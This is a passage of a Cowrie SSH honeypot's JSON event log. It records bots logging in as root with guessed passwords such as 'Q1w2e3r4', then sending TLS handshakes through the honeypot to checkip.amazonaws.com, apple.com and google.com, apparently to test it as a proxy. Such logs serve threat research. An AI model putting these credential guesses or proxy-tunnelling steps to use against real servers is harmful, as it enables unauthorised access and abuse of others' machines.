-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T15:53:27.475731Z","src_ip":"103.193.178.248","session":"ce7cf087acef"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:53:28.545376Z","src_ip":"103.193.178.248","session":"ce7cf087acef"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:53:28.804939Z","src_ip":"103.193.178.248","session":"ce7cf087acef"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:53:28.805803Z","src_ip":"103.193.178.248","session":"884a6a3e9a5c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57582,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a67f5d6e4c2","protocol":"ssh","message":"New connection: 212.227.235.229:57582 (1.2.3.4:22) [session: 3a67f5d6e4c2]","sensor":"my-vps","timestamp":"2025-08-26T15:54:28.540656Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","message":"Remote SSH version: SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","sensor":"my-vps","timestamp":"2025-08-26T15:54:28.541625Z","src_ip":"212.227.235.229","session":"3a67f5d6e4c2"}
{"eventid":"cowrie.client.kex","hassh":"390ffe68a68c2a2891210413e80689fa","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ecdsa-sha2-nistp256@openssh.com","ssh-ed25519","sk-ssh-ed25519@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: 390ffe68a68c2a2891210413e80689fa","sensor":"my-vps","timestamp":"2025-08-26T15:54:28.639671Z","src_ip":"212.227.235.229","session":"3a67f5d6e4c2"}
{"eventid":"cowrie.login.success","username":"root","password":"Q1w2e3r4","message":"login attempt [root/Q1w2e3r4] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:54:29.132712Z","src_ip":"212.227.235.229","session":"3a67f5d6e4c2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"54.154.170.203","dst_port":443,"src_ip":"212.227.235.229","src_port":58300,"message":"direct-tcp connection request to 54.154.170.203:443 from 127.0.0.1:58300","sensor":"my-vps","timestamp":"2025-08-26T15:54:31.234157Z","session":"3a67f5d6e4c2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"54.154.170.203","dst_port":443,"data":"b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xa93\\x14\\x1dXb\\xcf\\xe6\\xd4\\x0fi\\xd4r\\x82\\xb0%\\xb1\\x1f\\xc7\\x1f\\xb4\\x90i%-\\xfc\\x19eS\\xb27$ \\x1c\"F\\x11\\xe8J\\x1ak\\xa9\\x80\\xfeT\\xfe2Or\\xe4\\x9e\\x83\\r0ik\\xbb\\xb5rGg\\x0b\\x05\\xfb#\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 ?\\x14[\\xce\\x16\\xc7;R\\x04\\xdd\\xdd\\x92\\xa4\\xc3V\\xfaY\\xdd\\xaa\\r\\xac\\x81\\xe8\\xd1@U\\xcf\\xd4l\\xb2\\xdbI\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","id":0,"message":"discarded direct-tcp forward request 0 to 54.154.170.203:443 with data b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xa93\\x14\\x1dXb\\xcf\\xe6\\xd4\\x0fi\\xd4r\\x82\\xb0%\\xb1\\x1f\\xc7\\x1f\\xb4\\x90i%-\\xfc\\x19eS\\xb27$ \\x1c\"F\\x11\\xe8J\\x1ak\\xa9\\x80\\xfeT\\xfe2Or\\xe4\\x9e\\x83\\r0ik\\xbb\\xb5rGg\\x0b\\x05\\xfb#\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 ?\\x14[\\xce\\x16\\xc7;R\\x04\\xdd\\xdd\\x92\\xa4\\xc3V\\xfaY\\xdd\\xaa\\r\\xac\\x81\\xe8\\xd1@U\\xcf\\xd4l\\xb2\\xdbI\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","sensor":"my-vps","timestamp":"2025-08-26T15:54:31.343073Z","src_ip":"212.227.235.229","session":"3a67f5d6e4c2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"23.53.244.237","dst_port":443,"src_ip":"212.227.235.229","src_port":58622,"message":"direct-tcp connection request to 23.53.244.237:443 from 127.0.0.1:58622","sensor":"my-vps","timestamp":"2025-08-26T15:54:31.467517Z","session":"3a67f5d6e4c2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"23.53.244.237","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x87\\xb0\\x087\\xe4@\\x82\\x19\\xe6<\\x90\\xa8mm\\x8aT\\x84\\x9aT\\x7f\\x1bK\\xf3{\\xcd\\xb4\\x95\\xe03v\\xc1\\x92 W(\\xad\\xf4\\x12\\xb7\\x86\\x9a\\x90\\xc1\\xa1\\x93\\xda\\xfaHL\\xcb\\x1f`\\xd6\\x81\\xf9\\xf6\\xac\\xfb\\x00\\xcf\\x1es\\xc5CZ\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 {\\x16\\xc5u\\xd1\\\\fup\\xdfi%\\xb4q\\x9b\\x80!\\x97\\x18\\xd8;\\xd9Y\\xb1y\\x7f\\xa9&\\xe6\\xe2\\xdf8\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":1,"message":"discarded direct-tcp forward request 1 to 23.53.244.237:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x87\\xb0\\x087\\xe4@\\x82\\x19\\xe6<\\x90\\xa8mm\\x8aT\\x84\\x9aT\\x7f\\x1bK\\xf3{\\xcd\\xb4\\x95\\xe03v\\xc1\\x92 W(\\xad\\xf4\\x12\\xb7\\x86\\x9a\\x90\\xc1\\xa1\\x93\\xda\\xfaHL\\xcb\\x1f`\\xd6\\x81\\xf9\\xf6\\xac\\xfb\\x00\\xcf\\x1es\\xc5CZ\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 {\\x16\\xc5u\\xd1\\\\fup\\xdfi%\\xb4q\\x9b\\x80!\\x97\\x18\\xd8;\\xd9Y\\xb1y\\x7f\\xa9&\\xe6\\xe2\\xdf8\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T15:54:31.573590Z","src_ip":"212.227.235.229","session":"3a67f5d6e4c2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.251.36.4","dst_port":443,"src_ip":"212.227.235.229","src_port":58760,"message":"direct-tcp connection request to 142.251.36.4:443 from 127.0.0.1:58760","sensor":"my-vps","timestamp":"2025-08-26T15:54:31.677507Z","session":"3a67f5d6e4c2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.251.36.4","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xf6\\xadJ\\x960\\xca\\x11\\xeb&\\xcd\\t\\xcf\\x05l\\xf7\\xd3}\\xcc\\x86\\x8bW\\x0c\\xe4\\x13K\\x1c\\xde\\x04\\xe2\\x9b\\xe9\\x98 u\\xea\\x0c\\x81\\xfc;r\\x9a,0<Rf\\xf5\\xbb\\x99\\xdb\\xb84\\xc1\\xff\\xa6T\\x99\\xfav\\x93S\\xb0lvz\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xd7\\xd4Q\\xe0\\xe6F\\xc2\\xf1Kh+\\x81F\\xbf;\\x06q\\x10n?\\xf4\\x94L\\xcb\\x8f\\xe7W\\xb7\\xd1\\xe7\\xf6V\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":2,"message":"discarded direct-tcp forward request 2 to 142.251.36.4:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xf6\\xadJ\\x960\\xca\\x11\\xeb&\\xcd\\t\\xcf\\x05l\\xf7\\xd3}\\xcc\\x86\\x8bW\\x0c\\xe4\\x13K\\x1c\\xde\\x04\\xe2\\x9b\\xe9\\x98 u\\xea\\x0c\\x81\\xfc;r\\x9a,0<Rf\\xf5\\xbb\\x99\\xdb\\xb84\\xc1\\xff\\xa6T\\x99\\xfav\\x93S\\xb0lvz\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xd7\\xd4Q\\xe0\\xe6F\\xc2\\xf1Kh+\\x81F\\xbf;\\x06q\\x10n?\\xf4\\x94L\\xcb\\x8f\\xe7W\\xb7\\xd1\\xe7\\xf6V\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T15:54:31.783168Z","src_ip":"212.227.235.229","session":"3a67f5d6e4c2"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:54:31.882859Z","src_ip":"212.227.235.229","session":"3a67f5d6e4c2"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:54:32.188120Z","src_ip":"212.227.125.160","session":"8d84b919c88a"}
{"eventid":"cowrie.session.connect","src_ip":"58.144.199.22","src_port":54214,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c49a9a79501","protocol":"ssh","message":"New connection: 58.144.199.22:54214 (1.2.3.4:22) [session: 9c49a9a79501]","sensor":"my-vps","timestamp":"2025-08-26T15:54:40.792064Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T15:54:40.792944Z","src_ip":"58.144.199.22","session":"9c49a9a79501"}
